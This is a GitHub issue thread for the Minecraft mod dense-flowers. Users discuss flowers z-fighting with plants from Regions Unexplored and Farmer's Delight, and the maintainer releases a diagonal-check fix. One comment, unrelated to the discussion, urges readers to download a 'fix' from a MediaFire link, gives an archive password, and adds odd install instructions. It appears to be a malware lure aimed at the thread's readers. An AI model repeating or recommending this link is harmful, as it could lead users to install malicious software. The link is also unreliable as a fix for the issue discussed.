### ISSUE TITLE
Z Fighting with Regions Unexplored 1.21

### ISSUE THREAD

**Issue by makumaku1974** [ToBinio/dense-flowers#1]
I've used this mod a while ago and it cause visual bugs on modded plants. I think it's Z Fighting because the plants/flowers are too big which is causing a Z Fighting.

**Comment by ToBinio** [comment]
could you send a picture? 
since torch flowers are also too big and overlap but I can't find any case where z Fighting happens.

how would you like me to fix this?

I could add a config menu where you can add blacklisted flowers
or I could check if the hitboxes would overlap - but I don't think this would work since most of the time the hitbox does not align with the texture.
or maybe you have an idea for some other fix?

**Comment by makumaku1974** [comment]
i dont think you need a pic though. Tbf, Z fighting in minecraft is pretty common. If it's z fighting with torchflowers then thats the first thing to fix i guess.

**Comment by ToBinio** [comment]
ok I was finally able to get them to z fight

But I still can't think of any 100% solution for this. since this is just the nature of random placement.

I could check if 2 flowers are directly diagonal - but I can only do this for a single block not connecting once since this would require recursively checking which would most likely impact performance  

what do you think of adding a blacklisting option + checking diagonals within a block? this should handle 99% of cases

**Comment by makumaku1974** [comment]
I really dont have a clue on where to start, blacklisting would be only necessary if bugs occurred badly. So i dont think blacklisting for now is needed. Some of the biome mods like Regions Unexplored, Desolation, Wilder Wild, Etc. have massive overhaul within minecrafts vanilla generation including flowers and plants nada. 

("Barely optional" : I think dense leaves and ferns would be the next that overhauls with this mod or separated.)

**Comment by ToBinio** [comment]
then I will implement the diagonal check later today or tomorrow

with "dense leaves" do you just mean something like - https://modrinth.com/resourcepack/better-leaves

ferns and similar I can add - I will probably rebrand the mod though maybe "dense vegetation"?

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by makumaku1974** [comment]
> then I will implement the diagonal check later today or tomorrow
> 
> with "dense leaves" do you just mean something like - https://modrinth.com/resourcepack/better-leaves
> 
> ferns and similar I can add - I will probably rebrand the mod though maybe "dense vegetation"?

my bad, not dense leaves. 
dense vegetation would make sense.

btw this is also a z fighting with Farmer's Delight.
![image](https://github.com/user-attachments/assets/e51e3668-81ba-4f63-b403-6adb968e4b62)

**Comment by ToBinio** [comment]
just published [0.2.1](https://modrinth.com/mod/dense-flowers/version/0.2.1+mc1.21.0) that contains the diagonal check and another sodium fix
this should lower the amount of z-fighting

will close this issue since i cant think of any other reasonable way of improving z-fighting, sry

---

> ("Barely optional" : I think dense leaves and ferns would be the next that overhauls with this mod or separated.)

will keep this in mind but since i will need to rebrand the mod, this might take some time

--- 
thanks a lot for reporting & the quick responses!
